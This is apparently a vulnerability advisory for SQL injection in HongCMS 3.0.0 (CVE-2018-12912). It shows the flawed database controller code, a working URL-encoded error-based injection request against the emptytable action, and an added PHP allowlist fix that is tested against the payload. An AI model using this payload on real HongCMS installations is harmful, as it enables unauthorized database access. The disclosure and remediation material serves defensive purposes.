HongCMS 3.0.0 – SQL Injection

Vulnerable file: admin\controllers\database.php

private function EmptyTable($tablename)
{
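    // $tablename is interpolated as-is between the backticks of the statement
    $this->db->exe("DELETE FROM `$tablename`");
    // Message text: "Finished emptying database table: "
    $msg = '已完成清空数据库表: ' . $tablename . '<br/>';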

    return $msg;
}

The $tablename parameter is controllable by the requester and is interpolated directly into the DELETE statement.

PoC (requires administrator privileges):

/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60
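
One way to close this, shown as an added example that is not HongCMS code or the vendor's fix: check the table name against a strict character pattern and an allowlist of existing tables before it reaches the DELETE statement. The helper names and the table list are assumptions; the list is constructed sample data standing in for what the application would read from the database.

```php
<?php
// Added example, not HongCMS code. Helper names are hypothetical.

/**
 * Return a backtick-quoted identifier only if $name is a known table.
 * Throws InvalidArgumentException for anything else.
 */
function quote_known_table(string $name, array $knownTables): string
{
    // Strict character check first: rejects backticks, spaces, punctuation.
    if (preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name) !== 1) {
        throw new InvalidArgumentException('invalid table name');
    }
    // Exact-match allowlist with strict comparison (no type juggling).
    if (!in_array($name, $knownTables, true)) {
        throw new InvalidArgumentException('unknown table');
    }
    return '`' . $name . '`';
}

function build_empty_table_sql(string $name, array $knownTables): string
{
    return 'DELETE FROM ' . quote_known_table($name, $knownTables);
}

// Constructed sample data: 'hong_vvc' appears in the PoC, 'hong_admin' is made up.
$knownTables = ['hong_vvc', 'hong_admin'];
$inputs = [
    'hong_vvc',
    // tablename value from the PoC above, URL-decoded
    rawurldecode('hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60'),
    'no_such_table',
];

foreach ($inputs as $input) {
    try {
        echo build_empty_table_sql($input, $knownTables), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected (', $e->getMessage(), '): ', $input, PHP_EOL;
    }
}
```

Table names are identifiers, so prepared-statement placeholders cannot carry them; the allowlist is what keeps the value from changing the statement's structure.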

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12912
Exploit-DB: https://www.exploit-db.com/exploits/44953/